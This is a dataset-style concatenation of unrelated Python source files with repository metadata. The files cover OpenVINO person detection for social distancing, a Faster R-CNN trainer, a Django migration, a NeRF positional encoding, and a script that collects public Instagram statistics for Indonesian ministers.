self.ov_input_blob = next(iter(net.inputs))
self.out_blob = next(iter(net.outputs))
self.net = ie.load_network(network=net, num_requests=2, device_name="CPU")
# Read and pre-process input image
self.ov_n, self.ov_c, self.ov_h, self.ov_w = net.inputs[self.ov_input_blob].shape
del net
except Exception as e:
raise Exception(f"Load Openvino error:{e}")
self.load_openvino_reid()
def load_openvino_reid(self):
try:
ie = IECore()
net = IENetwork.from_ir(model=self.model_configfile_reid, weights=self.model_modelfile_reid)
self.ov_input_blob_reid = next(iter(net.inputs))
self.out_blob_reid = next(iter(net.outputs))
self.net_reid = ie.load_network(network=net, num_requests=2, device_name="CPU")
# Read and pre-process input image
self.ov_n_reid, self.ov_c_reid, self.ov_h_reid, self.ov_w_reid = net.inputs[self.ov_input_blob_reid].shape
del net
except Exception as e:
raise Exception(f"Load Openvino reidentification error:{e}")
def config_env(self, frame):
h, w = frame.shape[:2]
self.trackers.clear()
polylist = []
for pair in self.coords:
polylist.append([int(pair[0] * w / 100), int(pair[1] * h / 100)])
self.polygon = get_polygon(polylist)
def get_frame(self):
h = w = None
try:
cap = cv2.VideoCapture(self.videosource)
except Exception as e:
raise Exception(f"Video source error: {e}")
while self.running:
has_frame, frame = cap.read()
if has_frame:
if frame.shape[1] > 2000:
frame = cv2.resize(frame, (int(frame.shape[1] * .3), int(frame.shape[0] * .3)))
elif frame.shape[1] > 1000:
frame = cv2.resize(frame, (int(frame.shape[1] * .8), int(frame.shape[0] * .8)))
if w is None or h is None:
h, w = frame.shape[:2]
print(frame.shape)
self.config_env(frame)
yield frame
else:
self.running = False
return None
def process_frame(self, frame):
_frame = frame.copy()
trackers = []
frame = cv2.resize(frame, (self.ov_w, self.ov_h))
frame = frame.transpose((2, 0, 1))
frame = frame.reshape((self.ov_n, self.ov_c, self.ov_h, self.ov_w))
self.net.start_async(request_id=0, inputs={self.ov_input_blob: frame})
if self.net.requests[0].wait(-1) == 0:
res = self.net.requests[0].outputs[self.out_blob]
frame = _frame
h, w = frame.shape[:2]
out = res[0][0]
for i, detection in enumerate(out):
confidence = detection[2]
if confidence > self.confidence_threshold and int(detection[1]) == 1: # 1 => CLASS Person
xmin = int(detection[3] * w)
ymin = int(detection[4] * h)
xmax = int(detection[5] * w)
ymax = int(detection[6] * h)
if get_line([[xmin, ymax], [xmax, ymax]]).length < self.min_w:
self.min_w = get_line([[xmin, ymax], [xmax, ymax]]).length
elif get_line([[xmin, ymax], [xmax, ymax]]).length > self.max_w:
self.max_w = get_line([[xmin, ymax], [xmax, ymax]]).length
cX = int((xmin + xmax) / 2.0)
cY = int(ymax)
point = get_point([cX, cY])
if not self.polygon.contains(point):
continue
trackers.append(
TrackableObject((xmin, ymin, xmax, ymax), None, (cX, cY))
)
Draw.rectangle(frame, (xmin, ymin, xmax, ymax), "green", 2)
for tracker in trackers:
person = frame[tracker.bbox[1]:tracker.bbox[3], tracker.bbox[0]:tracker.bbox[2]]
try:
person = cv2.resize(person, (self.ov_w_reid, self.ov_h_reid))
except cv2.error as e:
print(f"CV2 RESIZE ERROR: {e}")
continue
person = person.transpose((2, 0, 1)) # Change data layout from HWC to CHW
person = person.reshape((self.ov_n_reid, self.ov_c_reid, self.ov_h_reid, self.ov_w_reid))
self.net_reid.start_async(request_id=0, inputs={self.ov_input_blob: person})
if self.net_reid.requests[0].wait(-1) == 0:
res = self.net_reid.requests[0].outputs[self.out_blob_reid]
tracker.reid = res
self.trackers.similarity(trackers)
if len(self.trackers.trackers) > 0:
track_tuples = list(combinations(self.trackers.trackers.keys(), 2))
for trackup in track_tuples:
l1 = self.trackers.trackers[trackup[0]].bbox
l2 = self.trackers.trackers[trackup[1]].bbox
if l1[3] < l2[3]:
a = (l1[0], l1[3])
b = (l1[2], l1[3])
c = (l2[0], l2[3])
d = (l2[2], l2[3])
else:
c = (l1[0], l1[3])
d = (l1[2], l1[3])
a = (l2[0], l2[3])
b = (l2[2], l2[3])
h, w = frame.shape[:2]
result = social_distance((h, w), a, b, c, d, self.iterations, self.min_w, self.max_w)
if result["alert"]:
xmin, ymin, xmax, ymax = get_crop(l1, l2)
Draw.rectangle(frame, l1, "yellow", 2)
Draw.rectangle(frame, l2, "yellow", 2)
Draw.rectangle(frame, (xmin, ymin, xmax, ymax), "red", 3)
return frame
def render(self, frame):
cv2.namedWindow("output", cv2.WINDOW_NORMAL)
frame = cv2.resize(frame, (960, 540))
cv2.imshow("Frame", frame)
key = cv2.waitKey(1) & 0xFF
if key == ord("q"):
exit()
def run(self):
self.load_openvino()
for frame in self.get_frame():
frame = self.process_frame(frame)
self.render(frame)
if __name__ == '__main__':
try:
sd = SocialDistance()
sd.run()
except Exception as exception:
print(exception)
|
[
"mateo.guzman@intel.com"
] |
mateo.guzman@intel.com
|
82122190857142b5874736d7b35ee3e46af75abd
|
1421d61938dafd86bf8195d0e24acb454e10ddb4
|
/env/bin/easy_install
|
84515a2c52d9864d43279b66c3975d52ed18078c
|
[
"MIT"
] |
permissive
|
EitanAugust/bme590hrm
|
61cd9df1a37347ef545f4430fae907b2e5856b7b
|
c8be75c44e124ee8a25d4cf0e1a17f739a8b5a58
|
refs/heads/master
| 2021-01-25T10:49:39.899559
| 2018-03-02T03:50:50
| 2018-03-02T03:50:50
| 123,371,359
| 0
| 0
| null | 2018-03-02T03:50:51
| 2018-03-01T02:34:02
|
Python
|
UTF-8
|
Python
| false
| false
| 287
|
#!/Users/eitanaugust/Documents/BME_590_Python/bme590hrm/env/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"eitanaugust@Eitans-MacBook-Pro.local"
] |
eitanaugust@Eitans-MacBook-Pro.local
|
|
e9b6db9a20f3e7de962bd3db279279e0f855907b
|
d9b59a931808a33703f80dee957f2fcbb19c9691
|
/blackout_data/time_between.py
|
3c091067dcf641de1fa7f3464495af66c27945e2
|
[] |
no_license
|
mahdifirouzi/Cascade
|
8cfa6f9d06a1428a4385046814e9e640404d648f
|
f75e97bcc34ecd1f57bbc0bb1b33e44d313aab8a
|
refs/heads/master
| 2023-03-18T17:38:46.820688
| 2011-09-06T21:03:18
| 2011-09-06T21:03:18
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 515
|
py
|
#!/usr/bin/python
import csv_reader
import sys, os
import datetime
import numpy
reader = csv_reader.Reader(sys.argv[1])
data = reader.get_columns(['year','month','day','Northeast'])
#data = reader.exclude_on(data,[3])
days_between = []
for i in range(len(data)-1):
event = datetime.date(int(data[i,0]),int(data[i,1]),int(data[i,2]))
next_event = datetime.date(int(data[i+1,0]),int(data[i+1,1]),int(data[i+1,2]))
days_between.append((next_event - event).days)
numpy.savetxt(sys.argv[2],days_between)
|
[
"aavardaro@gmail.com"
] |
aavardaro@gmail.com
|
80c34a1e44e07c68d76c231b58ed93ad3b7d7d09
|
12cad3e1f1ee44f1d74c3843c821fbe44c59c353
|
/example.py
|
fa265995ed1b757bc941c981d6ea6e57ef0ace14
|
[] |
no_license
|
DarrylEgbertNangoi-GitHub/CourseraIntroduction
|
a9d5bccb94e927ca8e20230517d2eb9560da7747
|
d780266fee3d07cd79d77a4cf62e1c95bd640779
|
refs/heads/main
| 2023-03-19T01:49:10.986096
| 2021-03-08T09:52:47
| 2021-03-08T09:52:47
| 345,601,082
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 102
|
py
|
def git_opeation():
print("I am adding example.py file to the remote repository.")
git_opeation()
|
[
"darryl.nangoi@binus.ac.id"
] |
darryl.nangoi@binus.ac.id
|
4b9a9e21bf5314a39049967c13d1cf3f98b46bc5
|
a6d2e07eea20f63579d6cd31044d26c7f786b8e4
|
/lib/model/train_val.py
|
e547fdaf8bb316d5deead1842c64c910020fb862
|
[] |
no_license
|
gaobb/CASD
|
4b0d882d4d7e12d3e8cef7f6842da6e226bc4c3d
|
9e45a282992a9411b1790f5009353716cb649626
|
refs/heads/master
| 2023-08-22T07:44:57.510863
| 2021-10-19T03:06:59
| 2021-10-19T03:06:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14,513
|
py
|
# --------------------------------------------------------
# Tensorflow Faster R-CNN
# Licensed under The MIT License [see LICENSE for details]
# Written by Xinlei Chen and Zheqi He
# --------------------------------------------------------
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorboardX as tb
from model.config import cfg
import roi_data_layer.roidb as rdl_roidb
from roi_data_layer.layer import RoIDataLayer
import utils.timer
try:
import cPickle as pickle
except ImportError:
import pickle
import torch
import torch.optim as optim
import numpy as np
import os
import glob
import time
import torch.nn.functional as F
from torch import nn
def update_learning_rate(optimizer, cur_lr, new_lr):
"""Update learning rate"""
if cur_lr != new_lr:
ratio = _get_lr_change_ratio(cur_lr, new_lr)
param_keys = []
for ind, param_group in enumerate(optimizer.param_groups):
param_group['lr'] = new_lr
param_keys += param_group['params']
def _get_lr_change_ratio(cur_lr, new_lr):
eps = 1e-10
ratio = np.max(
(new_lr / np.max((cur_lr, eps)), cur_lr / np.max((new_lr, eps)))
)
return ratio
def scale_lr(optimizer, scale):
"""Scale the learning rate of the optimizer"""
for param_group in optimizer.param_groups:
param_group['lr'] *= scale
class SolverWrapper(object):
"""
A wrapper class for the training process
"""
def __init__(self, network, imdb, roidb, valroidb, output_dir, tbdir, pretrained_model=None):
self.net = network
self.imdb = imdb
self.roidb = roidb
self.valroidb = valroidb
self.output_dir = output_dir
self.tbdir = tbdir
# Simply put '_val' at the end to save the summaries from the validation set
self.tbvaldir = tbdir + '_val'
if not os.path.exists(self.tbvaldir):
os.makedirs(self.tbvaldir)
self.pretrained_model = pretrained_model
def snapshot(self, iter):
if not os.path.exists(self.output_dir):
os.makedirs(self.output_dir)
# Store the model snapshot
filename = cfg.TRAIN.SNAPSHOT_PREFIX + '_iter_{:d}'.format(iter) + '.pth'
filename = os.path.join(self.output_dir, filename)
torch.save(self.net.state_dict(), filename)
print('Wrote snapshot to: {:s}'.format(filename))
# Also store some meta information, random state, etc.
nfilename = cfg.TRAIN.SNAPSHOT_PREFIX + '_iter_{:d}'.format(iter) + '.pkl'
nfilename = os.path.join(self.output_dir, nfilename)
# current state of numpy random
st0 = np.random.get_state()
# current position in the database
cur = self.data_layer._cur
# current shuffled indexes of the database
perm = self.data_layer._perm
# current position in the validation database
cur_val = self.data_layer_val._cur
# current shuffled indexes of the validation database
perm_val = self.data_layer_val._perm
# Dump the meta info
with open(nfilename, 'wb') as fid:
pickle.dump(st0, fid, pickle.HIGHEST_PROTOCOL)
pickle.dump(cur, fid, pickle.HIGHEST_PROTOCOL)
pickle.dump(perm, fid, pickle.HIGHEST_PROTOCOL)
pickle.dump(cur_val, fid, pickle.HIGHEST_PROTOCOL)
pickle.dump(perm_val, fid, pickle.HIGHEST_PROTOCOL)
pickle.dump(iter, fid, pickle.HIGHEST_PROTOCOL)
return filename, nfilename
def from_snapshot(self, sfile, nfile):
print('Restoring model snapshots from {:s}'.format(sfile))
self.net.load_state_dict(torch.load(str(sfile)))
print('Restored.')
# Needs to restore the other hyper-parameters/states for training, (TODO xinlei) I have
# tried my best to find the random states so that it can be recovered exactly
# However the Tensorflow state is currently not available
with open(nfile, 'rb') as fid:
st0 = pickle.load(fid)
cur = pickle.load(fid)
perm = pickle.load(fid)
cur_val = pickle.load(fid)
perm_val = pickle.load(fid)
last_snapshot_iter = pickle.load(fid)
np.random.set_state(st0)
self.data_layer._cur = cur
self.data_layer._perm = perm
self.data_layer_val._cur = cur_val
self.data_layer_val._perm = perm_val
return last_snapshot_iter
def construct_graph(self):
# Set the random seed
torch.manual_seed(cfg.RNG_SEED)
# Build the main computation graph
self.net.create_architecture(self.imdb.num_classes, tag='default',
anchor_scales=cfg.ANCHOR_SCALES,
anchor_ratios=cfg.ANCHOR_RATIOS)
# Define the loss
# loss = layers['total_loss']
# Set learning rate and momentum
lr = cfg.TRAIN.LEARNING_RATE
params = []
for key, value in dict(self.net.named_parameters()).items():
if value.requires_grad:
if 'refine' in key and 'bias' in key:
params += [{'params':[value],'lr':10*lr*(cfg.TRAIN.DOUBLE_BIAS + 1), 'weight_decay': cfg.TRAIN.BIAS_DECAY and cfg.TRAIN.WEIGHT_DECAY or 0}]
elif 'refine' in key and 'bias' not in key:
params += [{'params':[value],'lr':10*lr, 'weight_decay': getattr(value, 'weight_decay', cfg.TRAIN.WEIGHT_DECAY)}]
elif 'refine' not in key and 'bias' in key:
params += [{'params':[value],'lr':lr*(cfg.TRAIN.DOUBLE_BIAS + 1), 'weight_decay': cfg.TRAIN.BIAS_DECAY and cfg.TRAIN.WEIGHT_DECAY or 0}]
else:
params += [{'params':[value],'lr':lr, 'weight_decay': getattr(value, 'weight_decay', cfg.TRAIN.WEIGHT_DECAY)}]
self.optimizer = torch.optim.SGD(params, momentum=cfg.TRAIN.MOMENTUM)
# Write the train and validation information to tensorboard
self.writer = tb.writer.FileWriter(self.tbdir)
self.valwriter = tb.writer.FileWriter(self.tbvaldir)
return lr, self.optimizer
def find_previous(self):
sfiles = os.path.join(self.output_dir, cfg.TRAIN.SNAPSHOT_PREFIX + '_iter_*.pth')
sfiles = glob.glob(sfiles)
sfiles.sort(key=os.path.getmtime)
# Get the snapshot name in pytorch
redfiles = []
for stepsize in cfg.TRAIN.STEPSIZE:
redfiles.append(os.path.join(self.output_dir,
cfg.TRAIN.SNAPSHOT_PREFIX + '_iter_{:d}.pth'.format(stepsize+1)))
#sfiles = [ss for ss in sfiles if ss not in redfiles]
nfiles = os.path.join(self.output_dir, cfg.TRAIN.SNAPSHOT_PREFIX + '_iter_*.pkl')
nfiles = glob.glob(nfiles)
nfiles.sort(key=os.path.getmtime)
redfiles = [redfile.replace('.pth', '.pkl') for redfile in redfiles]
#nfiles = [nn for nn in nfiles if nn not in redfiles]
lsf = len(sfiles)
assert len(nfiles) == lsf
return lsf, nfiles, sfiles
def initialize(self):
# Initial file lists are empty
np_paths = []
ss_paths = []
# Fresh train directly from ImageNet weights
print('Loading initial model weights from {:s}'.format(self.pretrained_model))
self.net.load_pretrained_cnn(torch.load(self.pretrained_model))
print('Loaded.')
# Need to fix the variables before loading, so that the RGB weights are changed to BGR
# For VGG16 it also changes the convolutional weights fc6 and fc7 to
# fully connected weights
last_snapshot_iter = 0
lr = cfg.TRAIN.LEARNING_RATE
stepsizes = list(cfg.TRAIN.STEPSIZE)
return lr, last_snapshot_iter, stepsizes, np_paths, ss_paths
def restore(self, sfile, nfile):
# Get the most recent snapshot and restore
np_paths = [nfile]
ss_paths = [sfile]
# Restore model from snapshots
last_snapshot_iter = self.from_snapshot(sfile, nfile)
# Set the learning rate
lr_scale = 1
stepsizes = []
for stepsize in cfg.TRAIN.STEPSIZE:
if last_snapshot_iter > stepsize:
lr_scale *= cfg.TRAIN.GAMMA
else:
stepsizes.append(stepsize)
scale_lr(self.optimizer, lr_scale)
lr = cfg.TRAIN.LEARNING_RATE * lr_scale
return lr, last_snapshot_iter, stepsizes, np_paths, ss_paths
def remove_snapshot(self, np_paths, ss_paths):
to_remove = len(np_paths) - cfg.TRAIN.SNAPSHOT_KEPT
for c in range(to_remove):
nfile = np_paths[0]
os.remove(str(nfile))
np_paths.remove(nfile)
to_remove = len(ss_paths) - cfg.TRAIN.SNAPSHOT_KEPT
for c in range(to_remove):
sfile = ss_paths[0]
# To make the code compatible to earlier versions of Tensorflow,
# where the naming tradition for checkpoints are different
os.remove(str(sfile))
ss_paths.remove(sfile)
def train_model(self, max_iters):
# Build data layers for both training and validation set
self.data_layer = RoIDataLayer(self.roidb, self.imdb.num_classes)
self.data_layer_val = RoIDataLayer(self.valroidb, self.imdb.num_classes, random=True)
# Construct the computation graph
lr, train_op = self.construct_graph()
# Find previous snapshots if there is any to restore from
lsf, nfiles, sfiles = self.find_previous()
# Initialize the variables or restore them from the last snapshot
if lsf == 0:
lr, last_snapshot_iter, stepsizes, np_paths, ss_paths = self.initialize()
else:
lr, last_snapshot_iter, stepsizes, np_paths, ss_paths = self.restore(str(sfiles[-1]), str(nfiles[-1]))
iter = last_snapshot_iter + 1
last_summary_time = time.time()
# Make sure the lists are not empty
stepsizes.append(max_iters)
stepsizes.reverse()
next_stepsize = stepsizes.pop()
self.net.train()
self.net.to(self.net._device)
while iter < max_iters + 1:
# Learning rate
if iter == next_stepsize + 1:
# Add snapshot here before reducing the learning rate
self.snapshot(iter)
lr *= cfg.TRAIN.GAMMA
scale_lr(self.optimizer, cfg.TRAIN.GAMMA)
next_stepsize = stepsizes.pop()
#if ((iter -1) % cfg.TRAIN.MIL_RECURRENT_STEP) == 0:
# num_epoch = int((iter - 1) / cfg.TRAIN.MIL_RECURRENT_STEP) + 1
# cfg.TRAIN.MIL_RECURRECT_WEIGHT = ((num_epoch - 1)/20.0)/1.5
#if iter == cfg.TRAIN.MIL_RECURRENT_STEP + 1:
# cfg.TRAIN.MIL_RECURRECT_WEIGHT = cfg.TRAIN.MIL_RECURRECT_WEIGHT * 10
utils.timer.timer.tic()
# Get training data, one batch at a time
blobs = self.data_layer.forward(iter)
now = time.time()
if iter == 1 or now - last_summary_time > cfg.TRAIN.SUMMARY_INTERVAL:
# Compute the graph with summary
cls_det_loss, refine_loss_1, refine_loss_2, consistency_loss, total_loss, summary = \
self.net.train_step_with_summary(blobs, self.optimizer, iter)
# cls_det_loss, refine_loss_1, refine_loss_2, total_loss, summary = \
# self.net.train_step_with_summary(blobs, self.optimizer, iter)
#for _sum in summary: self.writer.add_summary(_sum, float(iter))
# Also check the summary on the validation set
#blobs_val = self.data_layer_val.forward()
#summary_val = self.net.get_summary(blobs_val, iter, drop_block)
#summary_val = self.net.get_summary(blobs_val, iter)
#for _sum in summary_val: self.valwriter.add_summary(_sum, float(iter))
last_summary_time = now
else:
# Compute the graph without summary
#cls_det_loss, refine_loss_1, refine_loss_2, total_loss = self.net.train_step(blobs, self.optimizer, iter)
cls_det_loss, refine_loss_1, refine_loss_2, consistency_loss, total_loss = self.net.train_step(blobs,self.optimizer,iter)
utils.timer.timer.toc()
# Display training information
if iter % (cfg.TRAIN.DISPLAY) == 0:
# print('iter: %d / %d, total loss: %.6f\n >>> cls_det_loss: %.6f\n '
# '>>> refine_loss_1: %.6f\n >>> refine_loss_2: %.6f\n >>> lr: %f' % \
# (iter, max_iters, total_loss, cls_det_loss, refine_loss_1, refine_loss_2, lr))
print('iter: %d / %d, total loss: %.6f\n >>> cls_det_loss: %.6f\n '
'>>> refine_loss_1: %.6f\n >>> refine_loss_2: %.6f\n >>> consistency_loss: %.6f\n >>> lr: %f' % \
(iter, max_iters, total_loss, cls_det_loss, refine_loss_1, refine_loss_2, consistency_loss, lr))
print('speed: {:.3f}s / iter'.format(utils.timer.timer.average_time()))
# for k in utils.timer.timer._average_time.keys():
# print(k, utils.timer.timer.average_time(k))
# Snapshotting
if iter % cfg.TRAIN.SNAPSHOT_ITERS == 0:
last_snapshot_iter = iter
ss_path, np_path = self.snapshot(iter)
np_paths.append(np_path)
ss_paths.append(ss_path)
# Remove the old snapshots if there are too many
if len(np_paths) > cfg.TRAIN.SNAPSHOT_KEPT:
self.remove_snapshot(np_paths, ss_paths)
iter += 1
if last_snapshot_iter != iter - 1:
self.snapshot(iter - 1)
self.writer.close()
self.valwriter.close()
def get_training_roidb(imdb):
"""Returns a roidb (Region of Interest database) for use in training."""
if cfg.TRAIN.USE_FLIPPED:
print('Appending horizontally-flipped training examples...')
imdb.append_flipped_images()
print('done')
print('Preparing training data...')
rdl_roidb.prepare_roidb(imdb)
print('done')
return imdb.roidb
def filter_roidb(roidb):
"""Remove roidb entries that have no usable RoIs."""
def is_valid(entry):
# Valid images have:
# (1) At least one foreground RoI OR
# (2) At least one background RoI
overlaps = entry['max_overlaps']
# find boxes with sufficient overlap
fg_inds = np.where(overlaps >= cfg.TRAIN.FG_THRESH)[0]
# Select background RoIs as those within [BG_THRESH_LO, BG_THRESH_HI)
bg_inds = np.where((overlaps < cfg.TRAIN.BG_THRESH_HI) &
(overlaps >= cfg.TRAIN.BG_THRESH_LO))[0]
# image is only valid if such boxes exist
valid = len(fg_inds) > 0 or len(bg_inds) > 0
return valid
num = len(roidb)
filtered_roidb = [entry for entry in roidb if is_valid(entry)]
num_after = len(filtered_roidb)
print('Filtered {} roidb entries: {} -> {}'.format(num - num_after,
num, num_after))
return filtered_roidb
def train_net(network, imdb, roidb, valroidb, output_dir, tb_dir,
pretrained_model=None,
max_iters=40000):
"""Train a Faster R-CNN network."""
roidb = filter_roidb(roidb)
valroidb = filter_roidb(valroidb)
sw = SolverWrapper(network, imdb, roidb, valroidb, output_dir, tb_dir,
pretrained_model=pretrained_model)
print('Solving...')
sw.train_model(max_iters)
print('done solving')
|
[
"huangzy666666@gmail.com"
] |
huangzy666666@gmail.com
|
76289dc29e23594f8f88518fc2be3110d6f1fd27
|
6f2d0c4e5f89d163241b8aa32b8ab8cf030ac59f
|
/sma/migrations/0002_attendance_grade_mentor_school_session_schedule_student_student_group_mentor_assignment.py
|
43747906e0891bdef54fb5dfa8e56fa0d4f7e76c
|
[] |
no_license
|
johnpgarza/omk-oldest
|
cc4f1578b19ee7c40ac1757608b8c20b25f34842
|
2992bbc12a0f1e31243db9e8bded75d46ec208eb
|
refs/heads/master
| 2023-08-19T08:48:22.017632
| 2020-04-26T01:00:38
| 2020-04-26T01:00:38
| 258,906,307
| 0
| 0
| null | 2021-09-22T18:55:37
| 2020-04-26T00:52:29
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 6,475
|
py
|
# Generated by Django 3.0.4 on 2020-03-20 04:28
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('sma', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Grade',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('grade_num', models.CharField(max_length=100)),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('updated_date', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='Mentor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('mentor_first_name', models.CharField(max_length=100)),
('mentor_middle_name', models.CharField(blank=True, max_length=100)),
('mentor_last_name', models.CharField(max_length=100)),
('mentor_email', models.EmailField(max_length=100)),
('mentor_address', models.CharField(max_length=200)),
('mentor_city', models.CharField(max_length=50)),
('mentor_state', models.CharField(max_length=50)),
('mentor_zip', models.CharField(max_length=10)),
('mentor_phone', models.CharField(max_length=50)),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('updated_date', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='School',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('school_name', models.CharField(max_length=100)),
('school_address', models.CharField(max_length=200)),
('school_city', models.CharField(max_length=50)),
('school_state', models.CharField(max_length=50)),
('school_zip', models.CharField(max_length=10)),
('school_email', models.EmailField(max_length=100)),
('school_phone', models.CharField(max_length=50)),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('updated_date', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='Student_Group_Mentor_Assignment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('group_name', models.CharField(max_length=100)),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('updated_date', models.DateTimeField(auto_now_add=True)),
('grade', models.ForeignKey(blank=True, default='', null=True, on_delete=django.db.models.deletion.CASCADE, to='sma.Grade')),
('mentor', models.ForeignKey(blank=True, default='', null=True, on_delete=django.db.models.deletion.CASCADE, to='sma.Mentor')),
('school', models.ForeignKey(blank=True, default='', null=True, on_delete=django.db.models.deletion.CASCADE, to='sma.School')),
],
),
migrations.CreateModel(
name='Student',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('student_first_name', models.CharField(max_length=100)),
('student_middle_name', models.CharField(blank=True, max_length=100)),
('student_last_name', models.CharField(max_length=100)),
('student_gender', models.CharField(max_length=100)),
('student_dateofbirth', models.DateTimeField(max_length=50)),
('student_email', models.EmailField(max_length=100)),
('student_address', models.CharField(max_length=200)),
('student_city', models.CharField(max_length=50)),
('student_state', models.CharField(max_length=50)),
('student_zip', models.CharField(max_length=10)),
('student_phone', models.CharField(max_length=50)),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('updated_date', models.DateTimeField(auto_now_add=True)),
('grade', models.ForeignKey(blank=True, default='', null=True, on_delete=django.db.models.deletion.CASCADE, to='sma.Grade')),
('school', models.ForeignKey(blank=True, default='', null=True, on_delete=django.db.models.deletion.CASCADE, to='sma.School')),
],
),
migrations.CreateModel(
name='Session_Schedule',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('session_location', models.CharField(max_length=50)),
('session_start_date', models.DateTimeField(max_length=20)),
('session_end_date', models.DateTimeField(max_length=20)),
('group', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sma.Student_Group_Mentor_Assignment')),
('mentor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sma.Mentor')),
],
),
migrations.CreateModel(
name='Attendance',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('attendance', models.CharField(max_length=100)),
('attendance_grade_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sma.Grade')),
('attendance_mentor_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sma.Mentor')),
('attendance_session_ID', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sma.Session_Schedule')),
('attendance_student_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sma.Student')),
],
),
]
|
[
"jgarza@unomaha.edu"
] |
jgarza@unomaha.edu
|
f5584a8dbc7c3d9effdab81e3e631e40c0e4f0f0
|
586aba25a13b90a21c90949fad303f8499cee42f
|
/model/positional_encoding.py
|
28f7b714267d2324960ead55848c7b940ff984c6
|
[] |
no_license
|
leejaeyong7/tc-nerf
|
c95301370eb41158f110bb0bc00760f52273708a
|
49bd2cf7afd6f69278a1fc9a7b2bada2351f86ca
|
refs/heads/main
| 2023-03-28T04:11:59.694524
| 2021-04-01T03:48:41
| 2021-04-01T03:48:41
| 309,032,701
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 795
|
py
|
import torch
from torch import nn
class PositionalEncoding(nn.Module):
def __init__(self, N_freqs, logscale=True):
"""
Defines a function that embeds x to (x, sin(2^k x), cos(2^k x), ...)
in_channels: number of input channels (3 for both xyz and direction)
"""
super(PositionalEncoding, self).__init__()
self.N_freqs = N_freqs
self.funcs = [torch.sin, torch.cos]
if logscale:
self.freq_bands = 2**torch.linspace(0, N_freqs-1, N_freqs)
else:
self.freq_bands = torch.linspace(1, 2**(N_freqs-1), N_freqs)
def forward(self, x):
out = [x]
for freq in self.freq_bands:
for func in self.funcs:
out += [func(freq*x)]
return torch.cat(out, -1)
|
[
"leejaeyong7@gmail.com"
] |
leejaeyong7@gmail.com
|
e68d468cc348fa28a58ca4b6567a053ae7440b3c
|
bdf574f292aa1617d6591cc58ba19ceb27a517be
|
/Instagram menteri.py
|
de9ff2c21417f9d354f7c634a7bccfbbfcfc1435
|
[] |
no_license
|
digilab-cfds/Profiling_Menteri_2019
|
ddcd9a2d21524dfd2c91cc2b2db1b8c1d0e6b20b
|
9190242a98eae27cc78a64de4cda9b81328cc4d2
|
refs/heads/master
| 2020-09-08T12:08:29.816908
| 2019-11-12T04:23:03
| 2019-11-12T04:23:03
| 221,129,056
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,422
|
py
|
#%%
#Login Instagram
from InstagramAPI import InstagramAPI
api = InstagramAPI("username", "password")
if (api.login()):
#api.getSelfUserFeed()
print("Login succes!")
else:
print("Can't login!")
#%%
listNama = ['mohmahfudmd', 'airlanggahartarto','muhadjir_effendy'
,'luhut_binsar_pandjaitan','prabowo','retno_marsudi'
,'smindrawati','agusgumiwangk','syahrulyasinlimpo'
,'siti.nurbayabakar','edhy.prabowo','sofyan.djalil','erickthohir'
,'wishnutama','bambangbrodjonegoro']
listId = [9503537257,3010352830,3898729931,2883229423,2142213578,6157128675,
4142926332,7139255865,2090763378 ,6329551081,5469831536,
3668403949,259804442,6668780,5844048390]
#%%
import pandas as pd
def getInfo(username, user_id):
api.getUsernameInfo(user_id)
data = api.LastJson
followers = data['user']['follower_count']
post = data['user']['media_count']
print('Username : ', username)
print('Followers : ', followers)
print('Posts : ', post)
more_available = True
max_id = ''
result = 0
comment = 0
like = 0
while more_available:
api.getUserFeed(user_id, max_id)
media = api.LastJson
post2 = media['num_results']
for i in range(int(post2)):
check = 'comment_likes_enabled' in media['items'][i]
#print(check)
if check==True:
c = media['items'][i]['comment_count']
comment += c
else:
c = 0
comment += c
l = media['items'][i]['like_count']
like += l
#print(media['items'][i]['comment_count'])
#print(media['items'][i]['like_count'])
result += api.LastJson['num_results']
#print('result : ',result)
more_available = api.LastJson['more_available']
if more_available == False:
print ('total post :', result)
else:
max_id = api.LastJson['next_max_id']
#print(max_id)
print('Total Comments : ', comment)
print('Total Likes : ', like)
d = [followers, post, comment, like]
return d
#%%
for i in range(len(listNama)):
output.append(getInfo(listNama[i],listId[i]))
df = pd.DataFrame(output)
df.columns = ['Total Followers','Total Post','Total Comments', 'Total Likes']
|
[
"noreply@github.com"
] |
digilab-cfds.noreply@github.com
|
66d24fc1b4e5f725e474f09fb23c79522bd46f9a
|
